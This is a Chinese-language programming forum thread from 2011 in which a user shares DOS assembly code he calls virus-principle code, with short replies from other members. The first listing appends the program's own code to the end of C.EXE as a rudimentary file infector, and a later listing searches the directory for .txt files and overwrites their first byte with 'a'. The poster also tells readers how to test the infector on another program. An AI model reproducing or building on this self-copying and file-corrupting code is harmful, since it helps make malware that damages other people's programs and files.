论坛 › 汇编语言交流 › 自己用汇编写的一段病毒原理代码

柏柏 发表于 2011-10-2 21:43:03

自己用汇编写的一段病毒原理代码

本帖最后由 柏柏 于 2011-11-5 16:04 编辑

这段代码就是复制自身代码的某段到别的程序尾部！！ 我修改了此病毒!!               更新中！往下看！下面有附件！！
assume cs:code,ds:code
code segment
VirusStart:
pop si
start: jmp xc
;---------------------------------------------
f_namea db 'C.EXE',0 ;f_namea 存放文件名称
f_worda dw ?,0 ;f-worda 存放'文件内容!'
f_hao dw ?,0 ;f_hao 存放句柄
VirusLength equ VirusEnd-VirusStart
;-----------------------------------------------
xc:
mov ah,3dh ;打开文件
mov dx,code
mov ds,dx
lea dx,f_namea
mov al,2
int 21h
mov f_hao,ax ;这是AX文件句柄->给f_hao存放
xwz:
mov ah,42h ;移动文件指针
mov al,2 ;到文件尾部
mov bx,f_hao
xor cx,cx
xor dx,dx
int 21h
xw:
mov ah,40h ;写入内容
mov bx,f_hao ;把文件句柄给bx
mov dx,si
mov cx,VirusLength
int 21h
xend:
mov ax,4c00h
int 21h
VirusEnd EQU $
code ends
end start
http://bbs.fishc.com/data/attachment/album/201111/05/1602227kwmlt76czagwdlp.jpg

深蓝 发表于 2011-10-2 22:27:43

强呀。。还是有些东西没看懂。。

顶你~~~

cyousui 发表于 2011-10-2 22:46:02

剩下的就是重定位，改写目标程序入口地址

Mr.han 发表于 2011-10-3 02:10:29

好好学习，天天向上，支持鱼C，哦也！！{:5_101:}

柏柏 发表于 2011-10-3 08:32:36

本帖最后由 柏柏 于 2014-2-21 11:29 编辑

此病毒就 是 把自己程序代码复制到 目录下 C.EXE文件的尾部。
没有什么危害但是请慎用！！

                                             --2011年10月3 日

柏柏 发表于 2011-10-3 08:42:42

也可以试验一下，把别的程序复制到目录下，再改为c.exe在运行下！！

柏柏 发表于 2011-10-3 08:47:13

先把别的程序复到 病毒程序 目录下 再改名为C.exe
然后 在点击 c.exe 看看有什么效果！

柏柏 发表于 2011-10-3 10:07:05

本帖最后由 柏柏 于 2011-10-3 12:01 编辑

喜欢 就
                  喜欢
{:5_109:}

苍白の月 发表于 2011-10-3 10:53:52

杀毒软件杀得动吗？？

柏柏 发表于 2011-10-3 10:59:30

苍白の月 发表于 2011-10-3 10:53 static/image/common/back.gif
杀毒软件杀得动吗？？

{:5_109:}恩,没有什么加密解密的,隐藏什么

JMP 发表于 2011-10-3 12:53:03

{:1_1:}支持下，顶顶顶！！！

s0512 发表于 2011-10-4 14:33:02

嗯。。。大大的GOOD

关键是感觉 发表于 2011-10-4 19:43:14

支持一下把
！

cqy55555 发表于 2011-10-4 23:13:07

很好,很强大,顶顶更强大!

crazylinux 发表于 2011-10-5 08:19:24

经典喜欢加油

柏柏 发表于 2011-10-5 14:05:32

本帖最后由 柏柏 于 2011-10-5 14:16 编辑

搜索代码：功能查找目录所有的[*。txt]文本文件 并在开头写入‘a’ 代码如下。不重复写入文件!!
.model tiny
.code
ORG 100h
start:
;========================
a db ?,0
bword db 'a',0
fhao dw ?,0
fname db '**.txt',0
;;========================
mov ah,4Eh ;查找第一个文件
mov dx,offset fname
int 21h
sloop:
jc fend
mov ax,3D02H;r/w 方式打开文件
mov dx,9Eh      ;文件名存放在dta
int 21h
mov fhao,ax       ;文件句柄存放在fhao

mov bx,fhao
mov cx,1
mov dx,offset a
mov ax,3f00h ;读文件开头前1个字节 因为cx=1
int 21h

cmp WORD ptr ,'a' ;比较当前打开文件开头如果写过久跳转
je ft   ;跳转


mov bx,fhao
mov dx,offset bword
mov cx,1
mov ah,40h   ;写文件 文件内容为‘a’
int 21h

; mov ah,3eh;关闭文件
; mov bx,fhao
; int 21h

ft:
mov ah,4Fh ;查找下一个文件
int 21h
jmp sloop
fend: mov ax,4c00h
int 21h

end start

wei522688662 发表于 2011-10-5 19:05:12

{:5_107:}厉害!

嗜血灵异狂 发表于 2011-10-5 20:04:23

问下这段代码有什么功能   可以让计算机死机蓝屏还是关机重启不了   还是监控   盗号呢？

Mr.han 发表于 2011-10-5 21:07:03

我是看不懂了 总之LZ比我强{:5_109:}

柏柏 发表于 2011-10-6 08:44:24

嗜血灵异狂 发表于 2011-10-5 20:04 static/image/common/back.gif
问下这段代码有什么功能   可以让计算机死机蓝屏还是关机重启不了   还是监控   盗号呢？

代码没有你说的这样!
代码前面有说明
{:5_109:}

查看完整版本: 自己用汇编写的一段病毒原理代码